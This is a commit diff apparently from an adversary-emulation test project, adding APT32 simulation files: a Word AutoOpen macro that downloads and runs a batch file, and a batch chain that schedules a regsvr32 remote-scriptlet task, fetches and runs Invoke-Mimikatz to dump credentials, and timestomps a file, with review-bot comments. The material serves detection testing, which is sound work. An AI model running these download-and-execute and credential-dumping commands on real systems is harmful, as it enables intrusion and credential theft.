commit
fd832ae264
|
@ -0,0 +1,3 @@
|
||||||
|
### Group: APT32, OceanLotus Group
|
||||||
|
[APT32](https://attack.mitre.org/wiki/Group/G0050)
|
||||||
|
|
|
@ -0,0 +1,48 @@
|
||||||
|
' Save Document As Single Web Page .mht
|
||||||
|
' Rename Document As .Doc
|
||||||
|
' This Document is modeled after FireEye's report on APT32
|
||||||
|
' Special Thanks to Nick Carr for his work on this write-ip
|
||||||
|
' https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
|
||||||
|
|
||||||
|
Sub AutoOpen()
|
||||||
|
|
||||||
|
Dim myURL As String
|
||||||
|
Dim myPath As String
|
||||||
|
|
||||||
|
|
||||||
|
If (MsgBox("You're Are About To Execute the ATOMIC Test for APT32, You sure?", 1, vbMsgBoxSetForeground) = 2) Then
|
||||||
|
End ' This Ends Macro
|
||||||
|
End If
|
||||||
|
|
||||||
|
' Downloads APT32 Chain Reaction Script
|
||||||
|
myURL = "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/atomic-dev-cs/ARTifacts/Chain_Reactions/chain_reaction_apt32.bat"
|
||||||
|
|
||||||
|
Dim WinHttpReq As Object
|
||||||
|
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
|
||||||
|
WinHttpReq.Open "GET", myURL, False, "username", "password"
|
||||||
|
WinHttpReq.send
|
||||||
|
|
||||||
|
myURL = WinHttpReq.responseBody
|
||||||
|
If WinHttpReq.Status = 200 Then
|
||||||
|
Set oStream = CreateObject("ADODB.Stream")
|
||||||
|
oStream.Open
|
||||||
|
oStream.Type = 1
|
||||||
|
oStream.Write WinHttpReq.responseBody
|
||||||
|
|
||||||
|
Dim fso As Object
|
||||||
|
Const FLDR_NAME As String = "C:\Tools\"
|
||||||
|
|
||||||
|
Set fso = CreateObject("Scripting.FileSystemObject")
|
||||||
|
|
||||||
|
If Not fso.FolderExists(FLDR_NAME) Then
|
||||||
|
fso.CreateFolder (FLDR_NAME)
|
||||||
|
End If
|
||||||
|
|
||||||
|
' Change Path HERE
|
||||||
|
oStream.SaveToFile "C:\Tools\NothingToSeeHere.bat", 2 ' 1 = no overwrite, 2 = overwrite
|
||||||
|
' EXECUTE FROM PATH
|
||||||
|
Shell "cmd.exe /c C:\Tools\NothingToSeeHere.bat"
|
||||||
|
oStream.Close
|
||||||
|
End If
|
||||||
|
|
||||||
|
End Sub
|
|
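Review bot: The macro executes whatever `chain_reaction_apt32.bat` happens to be on the mutable `atomic-dev-cs` branch (the `myURL = "https://raw.githubusercontent.com/.../atomic-dev-cs/..."` line), and nothing inspects the download between `oStream.SaveToFile` and `Shell "cmd.exe /c C:\Tools\NothingToSeeHere.bat"`, so the commands run on the test host can change after this document is distributed; reference a fixed revision instead, e.g. `myURL = "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/<commit-sha>/ARTifacts/Chain_Reactions/chain_reaction_apt32.bat"`, and ideally compare a known SHA-256 of the file before executing it. `myURL = WinHttpReq.responseBody` overwrites the URL with the raw response body before the status check and is never read again; it should be removed. The placeholder credentials in `WinHttpReq.Open "GET", myURL, False, "username", "password"` are not needed for raw.githubusercontent.com and only invite confusion about what is being authenticated. When `WinHttpReq.Status` is not 200 the macro exits with no message, so a blocked or failed fetch is indistinguishable from the operator having cancelled; a `MsgBox "Download failed: " & WinHttpReq.Status` in an `Else` branch would make that visible.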
@ -0,0 +1,32 @@
|
||||||
|
:: Adversary Group: https://attack.mitre.org/wiki/Group/G0050
|
||||||
|
:: xref: https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
|
||||||
|
:: Thanks to Nick Carr for his research on this group
|
||||||
|
:: Sample Representation of ATT&CK Techniques used by APT32
|
||||||
|
:: Tactics: Execution, Persistence, Privilege Escalation
|
||||||
|
|
||||||
|
|
||||||
|
:: Tactic: Privilege Escalation / Execution
|
||||||
|
:: Technique: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
|
||||||
|
:: Create Scheduled Task With RegSv32 Payload
|
||||||
|
|
||||||
|
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30
|
||||||
|
|
||||||
|
SCHTASKS /Delete /TN "Atomic Testing" /F
|
||||||
|
|
||||||
|
:: Tactics: Execution
|
||||||
|
:: Technique: PowerShell https://attack.mitre.org/wiki/Technique/T1086
|
||||||
|
|
||||||
|
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
|
||||||
|
|
||||||
|
:: Tactics: Defense Evasion
|
||||||
|
:: Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099
|
||||||
|
:: Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c
|
||||||
|
|
||||||
|
echo "Atomic Test File" > test.txt
|
||||||
|
PowerShell.exe -com {$file=(gi test.txt);$date='06/06/2006 12:12 pm';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date}
|
||||||
|
|
||||||
|
:: Tactics: Defense Evasion
|
||||||
|
:: technique: File Deletion https://attack.mitre.org/wiki/Technique/T1107
|
||||||
|
|
||||||
|
:: Deletes File, detection here would be File Modificaiton
|
||||||
|
del test.txt
|
|
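Review bot: The `powershell.exe "IEX (New-Object Net.WebClient).DownloadString(...Invoke-Mimikatz.ps1); Invoke-Mimikatz -DumpCreds"` line runs a live credential dump with no check that the script is on a disposable host or in an elevated context, so on an ordinary endpoint it either fails and the batch silently continues, or it prints real credentials to the console; add `net session >nul 2>&1 || (echo This chain requires an elevated prompt on a test host & exit /b 1)` near the top and a `::` comment stating that the test exposes credentials on the machine it runs on. The `SCHTASKS /Create ... /SC MINUTE ... /mo 30` task is removed by the very next `SCHTASKS /Delete` line, so whether the regsvr32 payload ever fires depends on the scheduler's start time; if only task creation/deletion telemetry is intended, say so in the comment, otherwise add `SCHTASKS /Run /TN "Atomic Testing"` before the delete. Both remote payloads are pulled from the unpinned `master` branch, so pinning them to a commit SHA would keep the test reproducible and keep the executed content from drifting. `echo "Atomic Test File" > test.txt` and the timestomp/delete steps use a relative path, so when launched via `cmd.exe /c` from the macro the artifact lands in whatever the current directory is rather than `C:\Tools`; a comment or an explicit path would help whoever is writing the detection.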
@ -0,0 +1,10 @@
|
||||||
|
# Timestomp
|
||||||
|
|
||||||
|
MITRE ATT&CK Technique: [T1099](https://attack.mitre.org/wiki/Technique/T1099)
|
||||||
|
|
||||||
|
## Timestomp with PowerShell
|
||||||
|
|
||||||
|
#### Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c
|
||||||
|
|
||||||
|
echo "Atomic Test File" > test.txt
|
||||||
|
PowerShell.exe -com {$file=(gi test.txt);$date='06/06/2006 12:12 pm';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date}
|
|
@ -35,6 +35,6 @@
|
||||||
| Winlogon Helper DLL | | [Rundll32](Execution/Rundll32.md) | | | | | | | |
|
| Winlogon Helper DLL | | [Rundll32](Execution/Rundll32.md) | | | | | | | |
|
||||||
| | | Scripting | | | | | | | |
|
| | | Scripting | | | | | | | |
|
||||||
| | | Software Packing | | | | | | | |
|
| | | Software Packing | | | | | | | |
|
||||||
| | | Timestomp | | | | | | | |
|
| | | [Timestomp](Defense%20Evasion/Timestomp.md | | | | | | | |
|
||||||
| | | [Trusted Developer Utilities](Execution/Trusted_Developer_Utilities.md) | | | | | | | |
|
| | | [Trusted Developer Utilities](Execution/Trusted_Developer_Utilities.md) | | | | | | | |
|
||||||
| | | Valid Accounts | | | | | | | |
|
| | | Valid Accounts | | | | | | | |
|
||||||
|
|